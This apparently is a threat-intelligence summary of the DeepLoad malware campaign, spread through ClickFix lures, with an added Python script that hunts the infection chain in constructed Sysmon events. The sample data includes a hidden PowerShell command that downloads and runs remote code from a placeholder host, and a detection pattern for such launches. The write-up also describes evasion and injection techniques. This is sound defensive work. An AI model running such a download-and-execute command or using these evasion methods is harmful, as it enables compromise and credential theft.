ReliaQuest has observed an in-the-wild campaign distributing a new malware family called DeepLoad that steals credentials and intercepts browser interactions. The campaign uses the ClickFix technique to trick users into running a persistent PowerShell loader that compiles evasive DLLs, injects into LockAppHost.exe, and facilitates real-time cryptocurrency theft. #DeepLoad #ClickFix
Keypoints
- DeepLoad was distributed through ClickFix lures: fake browser error prompts that walk the victim through copying a PowerShell command and running it themselves (typically by pasting it into the Windows Run dialog), so initial execution comes from the user rather than from an exploit.
- The PowerShell loader is persistent and, on each run, compiles a fresh DLL at runtime under a unique name in the user's Temp folder, so no stable file name or hash exists for signature-based detection.
- The loader disables PowerShell command history and invokes low-level Windows API functions directly instead of the higher-level calls that security tools typically hook, sidestepping user-mode monitoring. PowerShell Script Block Logging (event ID 4104) is not affected by the history setting and still records the loader's source when it is enabled.
- The loader injects the payload into LockAppHost.exe, the legitimate Windows lock-screen host process, via asynchronous procedure call (APC) injection, executing the decoded payload in memory so it is never written to disk as a file.
- DeepLoad includes a standalone credential stealer, drops a rogue browser extension to intercept sessions, and has been observed spreading via USB.
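The chain in the key points above (user-run PowerShell from a ClickFix prompt, a runtime-compiled DLL dropped in Temp, write access to LockAppHost.exe) maps onto a handful of host-telemetry checks. The Python below is an added example written for this page, not ReliaQuest's code and not an indicator from the campaign; the events, paths, process IDs, file name and URL are constructed, and only the Sysmon event IDs and field names (1 ProcessCreate, 10 ProcessAccess, 11 FileCreate, 13 RegistryEvent SetValue) are the standard ones.

```python
"""Hunting checks for a ClickFix -> PowerShell loader -> LockAppHost.exe injection chain,
run over constructed Sysmon-style events (added example; hypothetical telemetry)."""
import re
from collections import defaultdict

# Constructed sample events standing in for real Sysmon telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
LOCKAPP = r"C:\Windows\System32\LockAppHost.exe"
CMD = 'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/x)"'
SAMPLE_EVENTS = [
    # 13: Run-dialog history (RunMRU) captures what the victim pasted for ClickFix.
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "Details": CMD + "\\1"},
    # 1: explorer.exe (Run dialog) spawns the hidden PowerShell loader.
    {"EventID": 1, "ProcessId": 4120, "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": CMD},
    # 11: the loader writes a uniquely named DLL into %TEMP%.
    {"EventID": 11, "ProcessId": 4120, "Image": PS,
     "TargetFilename": r"C:\Users\victim\AppData\Local\Temp\q7x1kf2m.dll"},
    # 10: the loader opens LockAppHost.exe with full access before injecting.
    {"EventID": 10, "SourceProcessId": 4120, "SourceImage": PS,
     "TargetImage": LOCKAPP, "GrantedAccess": "0x1FFFFF"},
    # Benign noise: a query-only handle to LockAppHost.exe and an installer's Temp DLL.
    {"EventID": 10, "SourceProcessId": 900, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": LOCKAPP, "GrantedAccess": "0x1000"},
    {"EventID": 11, "ProcessId": 7788, "Image": r"C:\Users\victim\Downloads\setup.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Local\Temp\is-ABC12.tmp\helper.dll"},
]

PROCESS_VM_OPERATION, PROCESS_VM_WRITE = 0x0008, 0x0020   # rights needed to write remote memory
WRITE_MASK = PROCESS_VM_OPERATION | PROCESS_VM_WRITE
CLICKFIX_RE = re.compile(
    r"(powershell|pwsh|mshta|cmd)\b.*(-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass|iex|iwr|-enc)",
    re.I)
TEMP_DLL_RE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.dll$", re.I)
PS_NAMES = ("powershell.exe", "pwsh.exe")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def runmru_clickfix(events):
    """Sysmon 13: a RunMRU entry holding an interpreter launch with evasion flags."""
    return [e["Details"] for e in events if e["EventID"] == 13
            and "\\explorer\\runmru\\" in e["TargetObject"].lower()
            and CLICKFIX_RE.search(e["Details"])]


def temp_dll_from_powershell(events):
    """Sysmon 11: PowerShell writing a DLL straight into %TEMP% (runtime-compiled stage)."""
    return [(e["ProcessId"], e["TargetFilename"]) for e in events if e["EventID"] == 11
            and basename(e["Image"]) in PS_NAMES and TEMP_DLL_RE.search(e["TargetFilename"])]


def lockapphost_write_access(events):
    """Sysmon 10: a handle to LockAppHost.exe carrying rights that allow writing its memory.
    APC injection creates no remote thread, so Sysmon 8 never fires; this is the signal."""
    out = []
    for e in events:
        if e["EventID"] != 10 or basename(e["TargetImage"]) != "lockapphost.exe":
            continue
        if int(e["GrantedAccess"], 16) & WRITE_MASK == WRITE_MASK:
            out.append((e["SourceProcessId"], e["SourceImage"]))
    return out


def chain_by_process(events):
    """Tie the stages to one PowerShell process; return {pid: stages} where >= 2 stages hit."""
    stages = defaultdict(list)
    for e in events:
        if (e["EventID"] == 1 and basename(e["Image"]) in PS_NAMES
                and basename(e["ParentImage"]) == "explorer.exe"
                and CLICKFIX_RE.search(e["CommandLine"])):
            stages[e["ProcessId"]].append("clickfix_launch")
    for pid, _ in temp_dll_from_powershell(events):
        stages[pid].append("temp_dll")
    for pid, _ in lockapphost_write_access(events):
        stages[pid].append("lockapphost_access")
    return {pid: s for pid, s in stages.items() if len(s) >= 2}


if __name__ == "__main__":
    print("RunMRU ClickFix entries:", runmru_clickfix(SAMPLE_EVENTS))
    print("Temp DLLs from PowerShell:", temp_dll_from_powershell(SAMPLE_EVENTS))
    print("LockAppHost write access:", lockapphost_write_access(SAMPLE_EVENTS))
    print("Correlated chains:", chain_by_process(SAMPLE_EVENTS))
```

Each check is noisy on its own (installers write DLLs to Temp, security agents open handles to system processes), so the correlation by process ID is what gives a usable alert; in production, add an allow-list for endpoint agents that legitimately request write rights and feed the DLL path from the Sysmon 11 event to a file-collection step, since the compiled DLL is the one stage that does touch disk.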
Read More: https://www.securityweek.com/new-deepload-malware-dropped-in-clickfix-attacks/